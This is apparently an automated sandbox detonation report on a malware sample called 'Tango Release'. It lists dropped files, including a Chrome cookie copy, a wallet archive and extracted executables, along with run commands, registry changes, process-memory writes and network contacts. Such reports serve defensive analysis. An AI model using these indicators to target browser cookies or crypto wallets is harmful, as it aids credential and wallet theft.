C:\Users\Admin\AppData\Local\Temp\_MEI47242\python311.dll

C:\Users\Admin\AppData\Local\Temp\_MEI47242\VCRUNTIME140.dll

C:\Users\Admin\AppData\Local\Temp\_MEI47242\base_library.zip

C:\Users\Admin\AppData\Local\Temp\_MEI47242\_ssl.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI47242\_socket.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI47242\libcrypto-1_1.dll

C:\Users\Admin\AppData\Local\Temp\_MEI47242\charset_normalizer\md.cp311-win32.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI47242\_lzma.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI47242\_bz2.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI47242\charset_normalizer\md__mypyc.cp311-win32.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI47242\unicodedata.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI47242\_queue.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI47242\_hashlib.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI47242\libssl-1_1.dll

C:\Users\Admin\AppData\Local\Temp\_MEI47242\select.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI47242\_decimal.pyd

C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\python310.dll

C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\VCRUNTIME140.dll

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\libcrypto-1_1.dll

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\libssl-1_1.dll

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_queue.pyd

C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\charset_normalizer\md.pyd

C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\_hashlib.pyd

C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\_ssl.pyd

C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\select.pyd

C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\_socket.pyd

C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\_lzma.pyd

C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\_bz2.pyd

C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\ss.exe

C:\Users\Admin\AppData\Local\Temp\jlesyw.exe

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\temp_cookies.sqlite

C:\Users\Admin\AppData\Roaming\Armory.zip

C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat

Analysis: behavioral3

Detonation Overview

Submitted

2024-06-22 02:18

Reported

2024-06-22 02:21

Platform

win11-20240508-en

Max time kernel

89s

Max time network

94s

Command Line

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Tango Release\assets.dll",#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Tango Release\assets.dll",#1

Network

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-06-22 02:18

Reported

2024-06-22 02:21

Platform

win11-20240508-en

Max time kernel

118s

Max time network

132s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\Tango Release\instructions.txt"

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 5068 wrote to memory of 2824 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\NOTEPAD.EXE
PID 5068 wrote to memory of 2824 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\NOTEPAD.EXE

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\Tango Release\instructions.txt"

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\Tango Release\instructions.txt

Network

Country | Destination | Domain | Proto
US | 52.111.229.43:443 | | tcp

Files

N/A

Analysis: behavioral5

Detonation Overview

Submitted

2024-06-22 02:18

Reported

2024-06-22 02:21

Platform

win11-20240611-en

Max time kernel

91s

Max time network

97s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\Tango Release\license.txt"

Signatures

Enumerates physical storage devices

Modifies registry class

Description | Indicator | Process | Target
Key created | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 4008 wrote to memory of 1392 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\NOTEPAD.EXE
PID 4008 wrote to memory of 1392 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\NOTEPAD.EXE

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\Tango Release\license.txt"

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\Tango Release\license.txt

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp

Files

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-22 02:18

Reported

2024-06-22 02:21

Platform

win11-20240611-en

Max time kernel

145s

Max time network

151s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\Tango Release.rar"

Signatures

Enumerates physical storage devices

Modifies registry class

Description | Indicator | Process | Target
Key created | \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\MuiCache | C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A

Suspicious use of SetWindowsHookEx

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe | N/A
N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\Tango Release.rar"

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe

"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

Network

Files

C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat
